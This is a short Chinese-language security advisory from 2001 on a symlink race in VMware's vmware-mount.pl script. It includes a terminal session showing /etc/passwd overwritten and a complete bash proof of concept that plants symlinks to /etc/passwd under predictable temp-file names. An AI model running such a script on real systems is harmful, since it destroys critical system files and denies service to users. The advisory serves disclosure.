VMware 存在符号连接漏洞发布时间:2001-04-20 更新时间:2001-04-20 严重程度:中 威胁程度:本地拒绝服务 错误类型:竞争条件 利用方式:服务器模式 受影响系统 最新版本的VMware包详细描述 最新版本的VMware包中的vmware-mount.pl程序存在符号连接漏洞, 当使用vmware-mount.pl脚本来mount虚拟盘时候,会产生名字为 vmware-mount.pl.PID的临时文件,其中PID号码是当前命令的PID 号码,这就可以导致攻击者覆盖任意本地文件。 paul@ps:/tmp > id uid=500(paul) gid=100(users) Gruppen=100(users),90(firewall) paul@ps:/tmp > ./mpl.sh VMware local /etc/passwd DoS By Ihq. linking /etc/passwd to /tmp [+] please wait for root to run vmware-mount.pl 接着等待root运行vmware-mount.pl程序。 paul@ps:/tmp > id uid=500 gid=100(users) Gruppen=100(users),90(firewall) Obviously the passwd file has been overwritten: paul@ps:/tmp > cat /etc/passwd Nr Start Size Type Id Sytem -- ---------- ---------- ---- -- ------------------------ 1 63 2096577 BIOS C Win95 FAT32 (LBA) 测试代码 ---------------------- mpl.sh ---------------------- #/bin/bash declare -i n declare -i mx n=2 mx=32767 echo echo "VMware local /etc/passwd DoS" echo "By Ihq." echo echo " linking /etc/passwd to /tmp" while test $n -lt $mx ; do ln -s /etc/passwd /tmp/vmware-mount.pl.$n n=$(($n + 1)) done echo "[+] please wait for root to run vmware-mount.pl" echo 解决方案 设置相应属性。 相关信息 Paul Starzetz (paul@STARZETZ.DE) |
